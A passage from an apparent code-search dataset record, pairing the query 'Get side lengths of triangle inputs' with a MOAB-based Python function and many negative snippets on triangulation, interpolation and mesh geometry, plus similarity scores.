x = [float(p[0]) for p in v]\n y = [float(p[1]) for p in v]\n z = [float(p[2]) for p in v]\n\n # If the (x,y)-coordinates lie in a one-dimensional subspace, the\n # matplotlib Delaunay code segfaults. Therefore, we compute the\n # correlation of the x- and y-coordinates and add small random\n # noise to avoid the problem if needed.\n corr_matrix = numpy.corrcoef(x, y)\n if corr_matrix[0, 1] > 0.9 or corr_matrix[0, 1] < -0.9:\n ep = float(.000001)\n x = [float(p[0]) + random()*ep for p in v]\n y = [float(p[1]) + random()*ep for p in v]\n\n\n # If the list of data points has two points with the exact same\n # (x,y)-coordinate but different z-coordinates, then we sometimes\n # get segfaults. The following block checks for this and raises\n # an exception if this is the case.\n # We also remove duplicate points (which matplotlib can't handle).\n # Alternatively, the code in the if block above which adds random\n # error could be applied to perturb the points.\n drop_list = []\n nb_points = len(x)\n for i in range(nb_points):\n for j in range(i+1, nb_points):\n if x[i] == x[j] and y[i] == y[j]:\n if z[i] != z[j]:\n raise ValueError(\"Two points with same x,y coordinates and different z coordinates were given. Interpolation cannot handle this.\")\n elif z[i] == z[j]:\n drop_list.append(j)\n x = [x[i] for i in range(nb_points) if i not in drop_list]\n y = [y[i] for i in range(nb_points) if i not in drop_list]\n z = [z[i] for i in range(nb_points) if i not in drop_list]\n\n xmin = float(min(x))\n xmax = float(max(x))\n ymin = float(min(y))\n ymax = float(max(y))\n\n num_points = kwds['num_points'] if 'num_points' in kwds else int(4*numpy.sqrt(len(x)))\n #arbitrary choice - assuming more or less a nxn grid of points\n # x should have n^2 entries. We sample 4 times that many points.\n\n if interpolation_type == 'linear':\n T = tri.Triangulation(x, y)\n f = tri.LinearTriInterpolator(T, z)\n j = numpy.complex(0, 1)\n from .parametric_surface import ParametricSurface\n def g(x, y):\n z = f(x, y)\n return (x, y, z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'nn' or interpolation_type =='default':\n\n T=delaunay.Triangulation(x,y)\n f=T.nn_interpolator(z)\n f.default_value=0.0\n j=numpy.complex(0,1)\n vals=f[ymin:ymax:j*num_points,xmin:xmax:j*num_points]\n from .parametric_surface import ParametricSurface\n def g(x,y):\n i=round( (x-xmin)/(xmax-xmin)*(num_points-1) )\n j=round( (y-ymin)/(ymax-ymin)*(num_points-1) )\n z=vals[int(j),int(i)]\n return (x,y,z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'spline':\n from .plot3d import plot3d\n kx = kwds['kx'] if 'kx' in kwds else 3\n ky = kwds['ky'] if 'ky' in kwds else 3\n if 'degree' in kwds:\n kx = kwds['degree']\n ky = kwds['degree']\n s = kwds['smoothing'] if 'smoothing' in kwds else len(x)-numpy.sqrt(2*len(x))\n s = interpolate.bisplrep(x, y, z, [int(1)]*len(x), xmin, xmax, ymin, ymax, kx=kx, ky=ky, s=s)\n f = lambda x,y: interpolate.bisplev(x, y, s)\n return plot3d(f, (xmin, xmax), (ymin, ymax), texture=texture, plot_points=[num_points, num_points], **kwds)", "def triangles_svg_path(self):\n verts = self.vertices.split(',') # leave as string\n tris = [int(v) for v in self.triangles.split(',')]\n data = []\n for i in xrange(0, len(tris), 3):\n v0 = 2 * tris[i]\n v1 = 2 * tris[i + 1]\n v2 = 2 * tris[i + 2]\n data.append(u\"M%s,%sL%s,%sL%s,%sz\" % (\n verts[v0], verts[v0 + 1],\n verts[v1], verts[v1 + 1],\n verts[v2], verts[v2 + 1],\n ))\n return u\"\".join(data)", "def test_2_2_3D_cube_splits(self):\n check = [(0, 0, 0), (1, 1, 1), (1, 0, 0), (1, 1, 0), (1, 0, 1),\n (0, 1, 0),\n (0, 1, 1), (0, 0, 1), (0.5, 0.5, 0.5), (0.0, 0.5, 0.5),\n (0.0, 0.0, 0.5), (0.0, 0.5, 0.0), (0.5, 0.0, 0.5),\n (0.5, 0.0, 0.0),\n (0.5, 0.5, 0.0), (0.25, 0.25, 0.25), (1.0, 0.5, 0.5),\n (1.0, 1.0, 0.5),\n (1.0, 0.5, 1.0), (0.5, 1.0, 0.5), (0.5, 1.0, 1.0),\n (0.5, 0.5, 1.0),\n (0.75, 0.75, 0.75), (1.0, 0.0, 0.5), (1.0, 0.5, 0.0),\n (0.75, 0.25, 0.25), (0.5, 1.0, 0.0), (0.75, 0.75, 0.25),\n (0.5, 0.0, 1.0), (0.75, 0.25, 0.75), (0.0, 1.0, 0.5),\n (0.25, 0.75, 0.25), (0.0, 0.5, 1.0), (0.25, 0.75, 0.75),\n (0.25, 0.25, 0.75), (0.5, 0.25, 0.25), (0.5, 0.5, 0.25),\n (0.5, 0.25, 0.5), (0.25, 0.5, 0.25), (0.25, 0.5, 0.5),\n (0.25, 0.25, 0.5), (0.375, 0.375, 0.375), (0.0, 0.25, 0.25),\n (0.0, 0.0, 0.25), (0.0, 0.25, 0.0), (0.25, 0.0, 0.25),\n (0.25, 0.0, 0.0), (0.25, 0.25, 0.0), (0.125, 0.125, 0.125),\n (0.0, 0.5, 0.25), (0.0, 0.25, 0.5), (0.125, 0.375, 0.375),\n (0.25, 0.0, 0.5), (0.125, 0.125, 0.375), (0.25, 0.5, 0.0),\n (0.125, 0.375, 0.125), (0.5, 0.0, 0.25), (0.375, 0.125, 0.375),\n (0.5, 0.25, 0.0), (0.375, 0.125, 0.125), (0.375, 0.375, 0.125),\n (0.5, 0.75, 0.75), (0.5, 0.5, 0.75), (0.5, 0.75, 0.5),\n (0.75, 0.5, 0.75), (0.75, 0.5, 0.5), (0.75, 0.75, 0.5),\n (0.625, 0.625, 0.625), (1.0, 0.75, 0.75), (1.0, 1.0, 0.75),\n (1.0, 0.75, 1.0), (0.75, 1.0, 0.75), (0.75, 1.0, 1.0),\n (0.75, 0.75, 1.0), (0.875, 0.875, 0.875), (1.0, 0.5, 0.75),\n (1.0, 0.75, 0.5), (0.875, 0.625, 0.625), (0.75, 1.0, 0.5),\n (0.875, 0.875, 0.625), (0.75, 0.5, 1.0), (0.875, 0.625, 0.875),\n (0.5, 1.0, 0.75), (0.625, 0.875, 0.625), (0.5, 0.75, 1.0),\n (0.625, 0.875, 0.875), (0.625, 0.625, 0.875),\n (0.75, 0.5, 0.25),\n (0.75, 0.25, 0.5), (0.625, 0.375, 0.375), (1.0, 0.25, 0.25),\n (1.0, 0.0, 0.25), (1.0, 0.25, 0.0), (0.75, 0.0, 0.25),\n (0.75, 0.0, 0.0), (0.75, 0.25, 0.0), (0.875, 0.125, 0.125),\n (1.0, 0.5, 0.25), (1.0, 0.25, 0.5), (0.875, 0.375, 0.375),\n (0.75, 0.0, 0.5), (0.875, 0.125, 0.375), (0.75, 0.5, 0.0),\n (0.875, 0.375, 0.125), (0.625, 0.125, 0.375),\n (0.625, 0.125, 0.125),\n (0.625, 0.375, 0.125), (0.5, 0.75, 0.25),\n (0.625, 0.625, 0.375),\n (1.0, 0.75, 0.25), (1.0, 1.0, 0.25), (1.0, 0.75, 0.0),\n (0.75, 1.0, 0.25), (0.75, 1.0, 0.0), (0.75, 0.75, 0.0),\n (0.875, 0.875, 0.125), (0.875, 0.625, 0.375),\n (0.875, 0.875, 0.375),\n (0.875, 0.625, 0.125), (0.5, 1.0, 0.25), (0.625, 0.875, 0.375),\n (0.5, 0.75, 0.0), (0.625, 0.875, 0.125), (0.625, 0.625, 0.125),\n (0.5, 0.25, 0.75), (0.625, 0.375, 0.625), (1.0, 0.25, 0.75),\n (1.0, 0.0, 0.75), (1.0, 0.25, 1.0), (0.75, 0.0, 0.75),\n (0.75, 0.0, 1.0), (0.75, 0.25, 1.0), (0.875, 0.125, 0.875),\n (0.875, 0.375, 0.625), (0.875, 0.125, 0.625),\n (0.875, 0.375, 0.875),\n (0.5, 0.0, 0.75), (0.625, 0.125, 0.625), (0.5, 0.25, 1.0),\n (0.625, 0.125, 0.875), (0.625, 0.375, 0.875),\n (0.25, 0.75, 0.5),\n (0.375, 0.625, 0.375), (0.0, 0.75, 0.25), (0.0, 1.0, 0.25),\n (0.0, 0.75, 0.0), (0.25, 1.0, 0.25), (0.25, 1.0, 0.0),\n (0.25, 0.75, 0.0), (0.125, 0.875, 0.125), (0.0, 0.75, 0.5),\n (0.125, 0.625, 0.375), (0.25, 1.0, 0.5), (0.125, 0.875, 0.375),\n (0.125, 0.625, 0.125), (0.375, 0.875, 0.375),\n (0.375, 0.875, 0.125),\n (0.375, 0.625, 0.125), (0.25, 0.5, 0.75),\n (0.375, 0.625, 0.625),\n (0.0, 0.75, 0.75), (0.0, 1.0, 0.75), (0.0, 0.75, 1.0),\n (0.25, 1.0, 0.75), (0.25, 1.0, 1.0), (0.25, 0.75, 1.0),\n (0.125, 0.875, 0.875), (0.0, 0.5, 0.75), (0.125, 0.625, 0.625),\n (0.125, 0.875, 0.625), (0.25, 0.5, 1.0), (0.125, 0.625, 0.875),\n (0.375, 0.875, 0.625), (0.375, 0.875, 0.875),\n (0.375, 0.625, 0.875),\n (0.375, 0.375, 0.625), (0.0, 0.25, 0.75), (0.0, 0.0, 0.75),\n (0.0, 0.25, 1.0), (0.25, 0.0, 0.75), (0.25, 0.0, 1.0),\n (0.25, 0.25, 1.0), (0.125, 0.125, 0.875),\n (0.125, 0.375, 0.625),\n (0.125, 0.125, 0.625), (0.125, 0.375, 0.875),\n (0.375, 0.125, 0.625),\n (0.375, 0.125, 0.875), (0.375, 0.375, 0.875)]\n\n nn_checks = {(0.5, 0.25, 0.25): [(0.375, 0.375, 0.125), (0.5, 0.5, 0.0),\n (0.75, 0.25, 0.25),\n (0.625, 0.375, 0.375),\n (0.625, 0.125, 0.375),\n (0.625, 0.125, 0.125),\n (0.5, 0.5, 0.25), (0.25, 0.25, 0.25),\n (0.375, 0.375, 0.375),\n (0.5, 0.25, 0.5), (0.5, 0.5, 0.5),\n (0.5, 0.0, 0.25),\n (0.375, 0.125, 0.375), (0.5, 0.0, 0.5),\n (0.5, 0.25, 0.0),\n (0.375, 0.125, 0.125), (0.5, 0.0, 0.0),\n (0.625, 0.375, 0.125)],\n (0.625, 0.625, 0.875): [(0.75, 0.5, 1.0),\n (0.75, 0.75, 1.0),\n (0.5, 0.75, 1.0), (0.5, 0.5, 1.0),\n (0.5, 0.5, 0.75),\n (0.5, 0.75, 0.75),\n (0.75, 0.5, 0.75),\n (0.75, 0.75, 0.75)],\n (0, 0, 0): [(0.0, 0.25, 0.0), (0.125, 0.125, 0.125),\n (0.0, 0.0, 0.25), (0.25, 0.0, 0.0),\n (0.0, 0.25, 0.25), (0.25, 0.25, 0.0),\n (0.25, 0.0, 0.25)]}\n\n init_triangulation(3, 2, check, nn_checks)", "def get_3d_heads_inter():\n \n # Extract vertices and faces for the first head\n file_manager = ExitStack()\n atexit.register(file_manager.close)\n ref = importlib_resources.files('hypyp') / 'data/Basehead.obj'\n filename = file_manager.enter_context(importlib_resources.as_file(ref))\n\n mesh = meshio.read(Path(filename).resolve())\n zoom = 0.064\n interval = 0.32\n\n head1_v = mesh.points*zoom\n head1_f = mesh.cells[0].data\n\n # Copy the first head to create a second head\n head2_v = copy(mesh.points*zoom)\n # Move the vertices by Y rotation and Z translation\n rotY = np.pi\n newX = head2_v[:, 0] * np.cos(rotY) - head2_v[:, 2] * np.sin(rotY)\n newZ = head2_v[:, 0] * np.sin(rotY) + head2_v[:, 2] * np.cos(rotY)\n head2_v[:, 0] = newX\n head2_v[:, 2] = newZ\n\n head1_v[:, 2] = head1_v[:, 2] - interval/2\n head2_v[:, 2] = head2_v[:, 2] + interval/2\n\n # Use the same faces\n head2_f = copy(mesh.cells[0].data)\n\n # Concatenate the vertices\n vertices = np.concatenate((head1_v, head2_v))\n # Concatenate the faces, shift vertices indexes for second head\n faces = np.concatenate((head1_f, head2_f + len(head1_v)))\n return vertices, faces", "def Tol3d(self, *args):\n return _Adaptor3d.Adaptor3d_TopolTool_Tol3d(self, *args)", "def surfaces(self):\n surfaces = []\n for i in range(1000):\n surface = self.surfaceInfo(i)\n if surface is not None:\n surfaces.append(surface)\n else:\n break\n\n return surfaces", "def planeSliceGFig3(uxmax, uymax, rF2, lc, ax, ay, m, n, npoints = 3000, gsizex = 2048, gsizey = 2048, comp = True):\n\n # Calculate coefficients\n alp = rF2*lc\n coeff = alp*np.array([1./ax**2, 1./ay**2])\n uF2x, uF2y = rF2*np.array([1./ax**2, 1./ay**2])\n\n # Calculate caustic intersections\n ucross = polishedRoots(causticEqSlice, uxmax, uymax, args = (alp, m, n, ax, ay))\n ncross = len(ucross)\n upcross = mapToUp(ucross.T, alp, ax, ay)\n p = np.argsort(upcross[0])\n upcross = upcross.T[p]\n ucross = ucross[p]\n print(upcross)\n print(ucross)\n\n # Calculate sign of second derivative at caustics\n sigs = np.zeros(ncross)\n for i in range(ncross):\n sigs[i] = np.sign(ax**2/rF2 + lc*(lensh(*[ucross[i][0], ucross[i][1]])[0]))\n print(sigs)\n\n # Set up quantities for proper u' plane slicing\n ymin = -m*uxmax + n\n ymax = m*uxmax + n\n if ymin < -uymax:\n xmin = (-uymax - n)/m\n ymin = m*xmin + n\n else:\n xmin = -uxmax\n if ymax > uymax:\n xmax = (uymax - n)/m\n ymax = m*xmax + n\n else:\n xmax = uxmax\n xx = np.linspace(gridToPixel(xmin, uxmax, gsizex/2), gridToPixel(xmax, uxmax, gsizex/2) - 1, gsizex)\n yy = np.linspace(gridToPixel(ymin, uymax, gsizey/2), gridToPixel(ymax, uymax, gsizey/2) - 1, gsizey)\n\n cdist = uxmax/(np.abs(100*lc))\n print(cdist)\n\n bound = np.insert(upcross, 0, np.array([[xmin, ymin]]), axis = 0) # set up boundaries\n bound = np.append(bound, np.array([[xmax, ymax]]), axis = 0)\n # print(bound)\n midpoints = [(bound[i] + bound[i+1])/2. for i in range(len(bound) - 1)] # find middle point between boundaries\n nzones = len(midpoints)\n nreal = np.zeros(nzones)\n print(nzones)\n for i in range(nzones): # find number of roots at each midpoint\n mpoint = midpoints[i]\n nreal[i] = len(findRoots(lensEq, 2*uxmax, 2*uymax, args = (mpoint, coeff), N = 1000))\n upxvecs = np.array([np.linspace(bound[i-1][0] + cdist, bound[i][0] - cdist, npoints) for i in range(1, ncross + 2)]) # generate upx vector\n # print(upxvecs)\n segs = np.asarray([lineVert(upx, m, n) for upx in upxvecs]) # generate slice across plane\n diff = difference(nreal) # determine number of complex solutions\n if comp == True:\n ncomplex = np.ones(nzones)*100\n for i in range(nzones):\n if diff[i] == 0 or diff[i] == -2:\n ncomplex[i] = 1\n elif diff[i] == -4:\n ncomplex[i] = 2\n elif diff[i] == 4:\n ncomplex[i] = 0\n else:\n ncomplex = np.zeros(nzones)\n \n print(nreal)\n print(ncomplex)\n\n # Solve lens equation at each coordinate\n allroots = rootFinder(segs, nreal, ncomplex, npoints, ucross, uxmax, uymax, coeff)\n \n # Calculate fields\n allfields = []\n for i in range(nzones):\n fields = obsCalc(GOfield, allroots[i], len(allroots[i][0]), npoints, 3, args=(rF2, lc, ax, ay))\n allfields.append(fields)\n\n # Construct uniform asymptotics\n asymp = uniAsymp(allroots, allfields, nreal, ncomplex, npoints, nzones, sigs)\n interp = UnivariateSpline(upxvecs.flatten(), asymp, s = 0)\n finx = np.linspace(xmin, xmax, 4*npoints)\n asymG = interp(finx)\n\n # KDI\n rx = np.linspace(-2*uxmax, 2*uxmax, gsizex)\n ry = np.linspace(-2*uymax, 2*uymax, gsizey)\n dux = 4*uxmax/gsizex\n duy = 4*uymax/gsizey\n extent = (-uxmax, uxmax, -uymax, uymax)\n ux, uy = np.meshgrid(rx, ry)\n lens = lensPhase(ux, uy, lc)\n lensfft = fft2(lens)\n geo = geoPhase(ux, uy, uF2x, uF2y)\n geofft = fft2(geo)\n fieldfft = lensfft*geofft\n field = fftshift(ifft2(fieldfft))\n soln = np.abs((dux*duy*field)**2/(4*pi**2*uF2x*uF2y))\n soln = soln[int(0.25*gsizex):int(0.75*gsizex), int(0.25*gsizey):int(0.75*gsizey)]\n\n # Plots\n fig = plt.figure(figsize = (15, 6), dpi = 100)\n grid = gs.GridSpec(1, 2)\n # tableax = plt.subplot(grid[1, :])\n # tableax2 = plt.subplot(grid[2, :])\n ax0, ax1 = plt.subplot(grid[0, 0]), plt.subplot(grid[0, 1])\n\n rx = np.linspace(-uxmax, uxmax, gsizex)\n ry = np.linspace(-uymax, uymax, gsizey)\n ux, uy = np.meshgrid(rx, ry)\n\n rx2 = np.linspace(xmin, xmax, gsizex)\n im0 = ax0.imshow(soln, origin = 'lower', extent = extent, aspect = 'auto') # Plot entire screen\n cbar = fig.colorbar(im0, ax = ax0)\n # cbar.set_label(r'$\\log{G}$', fontsize = 16)\n cbar.set_label('G', fontsize=18)\n cbar.ax.tick_params(labelsize=14)\n ucaus = causCurve([ux, uy], lc*np.array([uF2x, uF2y]))\n cs = plt.contour(np.linspace(-uxmax, uxmax, gsizex), ry, ucaus, levels = [0, np.inf], linewidths = 0)\n paths = cs.collections[0].get_paths()\n uppaths = []\n for p in paths:\n cuvert = np.array(p.vertices).T\n upx, upy = mapToUp(cuvert, alp, ax, ay)\n ax0.plot(upx, upy, color = 'white') # Plot caustic curves\n ax0.scatter(upcross.T[0], upcross.T[1], color = 'white')\n ax0.plot(rx2, rx2*m + n, color = 'white') # Plot observer motion\n ax0.set_xlabel(r\"$u'_x$\", fontsize = 18)\n ax0.set_ylim([-uymax, uymax])\n ax0.set_xlim([-uxmax, uxmax])\n ax0.set_ylabel(r\"$u'_y$\", fontsize = 18)\n ax0.tick_params(labelsize = 14)\n # ax0.set_title(\"Gain in the u' plane\")\n\n G = map_coordinates(soln.T, np.vstack((xx, yy))) # Plot gain along observer motion\n G = G - G[-1] + 1\n ax1.plot(rx2, G, color = 'blue', label = \"FFT gain\")\n for caus in upcross.T[0]:\n ax1.plot([caus, caus], [-10, 1000], ls = 'dashed', color = 'black')\n ax1.plot(finx, asymG, color = 'red', label = r\"$2^{nd}$ order GO gain\")\n ax1.set_ylim(-cdist, np.max(asymG) + 1.)\n ax1.set_xlim(np.min(rx2), np.max(rx2))\n ax1.set_xlabel(r\"$u'_x$\", fontsize = 18)\n ax1.set_ylabel('G', fontsize = 18)\n # ax1.set_title(\"Slice Gain\")\n ax1.tick_params(labelsize = 14)\n ax1.grid()\n ax1.legend(loc = 1, fontsize = 14)\n\n\n # col_labels = ['Parameter', 'Value'] # Create table with parameter values\n # if np.abs(dm/pctocm) < 1:\n # dmlabel = \"{:.2E}\".format(Decimal(dm/pctocm))\n # else:\n # dmlabel = str(dm/pctocm)\n # tablevals = [[r'$d_{so} \\: (kpc)$', np.around(dso/pctocm/kpc, 2)], [r'$d_{sl} \\: (kpc)$', np.around(dsl/pctocm/kpc, 3)], [r'$a_x \\: (AU)$', np.around(ax/autocm, 3)], [r'$a_y \\: (AU)$', np.around(ay/autocm, 3)], [r'$DM_l \\: (pc \\, cm^{-3})$', dmlabel], [r\"$\\nu$ (GHz)\", f/GHz], ['Slope', np.around(m, 2)], ['Offset', n]]\n # tableax.axis('tight')\n # tableax.axis('off')\n # table = tableax.table(cellText = np.asarray(tablevals).T, colWidths = np.ones(8)*0.045, rowLabels = col_labels, loc = 'center')\n # table.auto_set_font_size(False)\n # table.set_fontsize(11)\n # table.scale(2.5, 2.5)\n \n # row_label = ['Lens shape']\n # val = [['$%s$' % sym.latex(lensf)]]\n # tableax2.axis('tight')\n # tableax2.axis('off')\n # table2 = tableax2.table(cellText=val, colWidths=[0.0015*len(sym.latex(lensf))], rowLabels=row_label, loc='top')\n # table2.auto_set_font_size(False)\n # table2.set_fontsize(12)\n # table2.scale(2.5, 2.5)\n\n grid.tight_layout(fig, pad = 1.5)\n plt.show()\n return", "def exportDT(self):\n # Filter out coordinates in the extended BBox\n coord = self.coords[4:]\n\n # Filter out triangles with any vertex in the extended BBox\n tris = [(a-4, b-4, c-4)\n for (a, b, c) in self.triangles if a > 3 and b > 3 and c > 3]\n return coord, tris" ]
[ "0.6223683", "0.6053743", "0.6050365", "0.57075876", "0.5699507", "0.56639516", "0.563397", "0.56318665", "0.56237847", "0.5588242", "0.55818903", "0.54913247", "0.5476087", "0.5466476", "0.5459577", "0.54140794", "0.53891593", "0.5373516", "0.53725284", "0.5370129", "0.5351034", "0.53492194", "0.5347101", "0.5333059", "0.5330313", "0.53092873", "0.5306608", "0.52988666", "0.5297941", "0.52961797", "0.52949", "0.52834296", "0.5283315", "0.5276761", "0.52680814", "0.5232819", "0.5225444", "0.52086216", "0.5204744", "0.5199769", "0.5196541", "0.51911426", "0.5190773", "0.5187722", "0.51843876", "0.5181303", "0.51794577", "0.51754314", "0.5170286", "0.516798", "0.51486015", "0.5146055", "0.5142659", "0.5109515", "0.50993574", "0.5098497", "0.50934595", "0.50902385", "0.5083284", "0.50797564", "0.50782317", "0.5070887", "0.5069434", "0.506923", "0.50661665", "0.50504136", "0.50479984", "0.504575", "0.50435984", "0.50343496", "0.50310904", "0.50246435", "0.50242686", "0.5024203", "0.5014532", "0.5013931", "0.5005499", "0.49993503", "0.49972594", "0.49827254", "0.49777335", "0.49757603", "0.4975548", "0.49740586", "0.4969818", "0.49666196", "0.4961869", "0.4956638", "0.49546653", "0.4951289", "0.4941841", "0.49368444", "0.49357986", "0.49335307", "0.49334747", "0.49316537", "0.4924668", "0.49205214", "0.49203542", "0.49203026" ]
0.5960203
3
Get side lengths of triangle inputs
def get_tri_side_length(my_core, tri): side_lengths = [] s = 0 coord_list = [] verts = list(my_core.get_adjacencies(tri, 0)) for vert in verts: coords = my_core.get_coords(vert) coord_list.append(coords) for side in range(3): side_lengths.append(np.linalg.norm(coord_list[side]-coord_list[side-2])) # The indices of coord_list includes the "-2" because this way each side will be matched up with both # other sides of the triangle (IDs: (Side 0, Side 1), (Side 1, Side 2), (Side 2, Side 0)) return side_lengths
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def square_triangle(sides: list) -> float:\n h_per = (sides[0] + sides[1] + sides[2]) / 2 #half-perimetr\n square = math.sqrt (h_per * (h_per- sides[0]) * (h_per - sides[1]) * (h_per - sides[2]))\n return square", "def triangle(self):\n \n R = Householder.triangle_operation(self)[0] \n \n return(R.round(10))", "def area_triangle(w, h):\n return w * h / 2", "def triangle_area(side1: number, side2: number, side3: number) -> number:\n s = (side1+side2+side3)/2\n area = sqrt(s*(s-side1)*(s-side2)*(s-side3))\n return sqrt(s*(s-side1)*(s-side2)*(s-side3))", "def triangleArea(a: Vec3, b: Vec3, c: Vec3) -> float:\n return cross3(b - a, c - a).length() / 2.0", "def area_triangle_sss(side1,side2,side3):\n semi_perim=(side1+side2+side3)/2.0\n return math.sqrt(semi_perim*\n (semi_perim - side1)*\n (semi_perim - side2)*\n (semi_perim - side3)\n )", "def area_triangle_sss(side1, side2, side3):\n \n # Use Heron's formula\n semiperim = (side1 + side2 + side3) / 2.0\n return math.sqrt(semiperim *\n (semiperim - side1) *\n (semiperim - side2) * \n (semiperim - side3))", "def triangle(self, freq: int, /) -> None:", "def sides(self):\n return len(self)", "def Lengths(self):\n\n self.__do_essential_memebers_exist__()\n\n if self.element_type == \"line\":\n coords = self.points[self.elements[:,:2],:]\n lengths = np.linalg.norm(coords[:,1,:] - coords[:,0,:],axis=1)\n else:\n # self.GetEdges()\n # coords = self.points[self.all_edges,:]\n coords = self.points[self.elements[:,:2],:]\n lengths = np.linalg.norm(coords[:,1,:] - coords[:,0,:],axis=1)\n\n return lengths", "def triangle(n):\n return n*(n+1)/2", "def getSideLength():\n side = float(input(\"How long do you want the side length?\"))\n return side", "def triangle(n):\n return (n * (n + 1)) / 2", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def ui_input() -> list:\n print('Enter three sides of the triangle:')\n sides = [int(input()), int(input()), int(input())]\n return sides", "def lengths(self):\n lengths = []\n last = self._coordinates[-1]\n for c in self._coordinates:\n lengths.append(((c[0]-last[0])**2 + (c[1]-last[1])**2) ** 0.5)\n last = c\n return sorted(lengths)", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def triangular_area():\n print(1*1/2, 2*2/2, 3*3/2, 4*4/2, 5*5/2, 6*6/2, 7*7/2, 8*8/2, 9*9/2,\n 10*10/2)", "def triangle_area(base, height):\n return (base * height) / 2", "def len_func(polygon):\n ret=[]\n N=len(polygon)\n for i in range(1,N):\n l = ((polygon[i][0]-polygon[i-1][0])**2 + (polygon[i][1]-polygon[i-1][1])**2 )**0.5\n ret.append(l)\n l = ((polygon[0][0]-polygon[N-1][0])**2 + (polygon[0][1]-polygon[N-1][1])**2 )**0.5\n ret.append(l)\n return ret", "def area_of_a_triangle(length_1, length_2, length_3):\r\n half_perimeter = (length_1 + length_2 + length_3) / 2\r\n area = (half_perimeter * (half_perimeter-length_1) * (half_perimeter-length_2) * (half_perimeter-length_3)) ** 0.5\r\n return area", "def triangle(self):\n [r,c] = self.D\n m = min(r,c)\n S = self\n T = zeros(r,c)\n while m > 0:\n NoLigne = 0\n while S[NoLigne, 0] == 0 and (NoLigne < m - 1):\n NoLigne += 1\n S = S.swap(NoLigne,0)\n if S[0, 0] != 0:\n pivot = S[0,0]\n for k in range(1,m):\n if S[k,0] != 0:\n S = S.comb_lignes(pivot, -S[k,0],k,0)\n #print(\"pivot = \"+str(pivot))\n #print(\"S dans for :\")\n #print(S)\n T = T.remplace_ligned(r - m,S.F)\n #print(\"Évolution de T :\")\n #print(T)\n S = S.decoupe()\n m -= 1\n return T", "def EdgeLengths(self,which_edges='boundary'):\n\n assert self.points is not None\n assert self.element_type is not None\n\n\n lengths = None\n if which_edges == 'boundary':\n if self.edges is None:\n self.GetBoundaryEdges()\n\n edge_coords = self.points[self.edges[:,:2],:]\n lengths = np.linalg.norm(edge_coords[:,1,:] - edge_coords[:,0,:],axis=1)\n\n elif which_edges == 'all':\n if self.all_edges is None:\n self.GetEdges()\n\n edge_coords = self.points[self.all_edges[:,:2],:]\n lengths = np.linalg.norm(edge_coords[:,1,:] - edge_coords[:,0,:],axis=1)\n\n return lengths", "def triangle(n: int) -> int:\n return int(n * (n + 1) / 2)", "def get_sides(vertices):\n return [dist(vertices[1], vertices[2]),\n dist(vertices[2], vertices[0]),\n dist(vertices[0], vertices[1])]", "def triangle(a, b, c):\n longest = max(a, b, c)\n \n sum_of_others = a + b + c - longest # or min(a+b, a+c, b+c)\n \n return longest < sum_of_others", "def triangle(halfSideLength = 15, robotHeight = -90):\n# ^ \n# / \\ \n# / \\ \n# / \\ \n# /_______\\\n# \n# | a | \n# a = halfSideLength\n\n hHalf = (halfSideLength * m.sqrt(3)/2)/2\n\n posTriangle = [\n [-hHalf,halfSideLength,robotHeight,0,0,0,'mov'],\n [-hHalf,-halfSideLength,robotHeight,0,0,0,'lin'],\n [hHalf,0,robotHeight,0,0,0,'lin'],\n [-hHalf,halfSideLength,robotHeight,0,0,0,'lin'],\n [0,0,-127,0,0,0,'mov']\n ]\n\n return posTriangle", "def triangle_shape(height):\n mot = str()\n if height == 0:\n return str()\n else :\n for i in range (height):\n esp = height-1-i\n mot = mot+ esp*\" \" + (2*i+1)*\"x\" +esp*\" \"\n if i!=height-1:\n mot = mot+ \"\\n\"\n return(mot)", "def leg_length(self, *args):\n i, j = args\n return Partition(list(self)).leg_length(i-1, j-1)", "def levshape(self) -> Shape:\n return tuple(len(x) for x in self.levels)", "def triangleFunction(self):\n \n w = np.zeros((self.N))\n l = self.l\n for i in range(self.r.shape[0]):\n r = np.abs(self.r[i])\n if r <= l:\n tf = lambda r,l : 1 - r/l\n w[i] = tf(r,l)\n else:\n w[i] = 0\n self.w = w", "def length(vec):\n\n return math.sqrt(dotproduct(vec, vec))", "def length(v):\n return math.sqrt(v[0]**2 + v[1]**2)", "def length(vec):\n return vec.dot(vec)**.5", "def getLength(self):\n return self.sideLength", "def getIndividualTopLengths(self):\n nquad = self.getNumQuads()\n lengths = np.zeros(nquad)\n for i in range(nquad):\n P0, P1, P2, P3 = self._quadrilaterals[i]\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n lengths[i] = (p1 - p0).mag() / 1000.0\n return lengths", "def triangle(length=40.0, r=3.175 / 2):\n\t# equilateral triangle:\n\ta = np.array([0, 0])\n\tb = np.array([length, 0])\n\tc = np.array([length / 2, length * math.sin(math.pi / 3)])\n\ttri_pts = PolyLine([a, b, c, a])\n\toffs_pts = addOffset(tri_pts, r)\n\ttri_pts = centerObjects(offs_pts, tri_pts)\n\treturn tri_pts, offs_pts", "def compute_triangle_area(vertices):\n v01 = vertices[0] - vertices[1]\n v02 = vertices[0] - vertices[2]\n cross_prod = np.cross(v01, v02)\n area = 0.5 * np.linalg.norm(cross_prod)\n return area", "def cube_area(side_length):\n area = side_length ** 3\n return area", "def _triangle_areas(self, point):\n vertex_0, vertex_1, vertex_2 = self._vertices(point)\n len_edge_12 = gs.linalg.norm((vertex_1 - vertex_2), 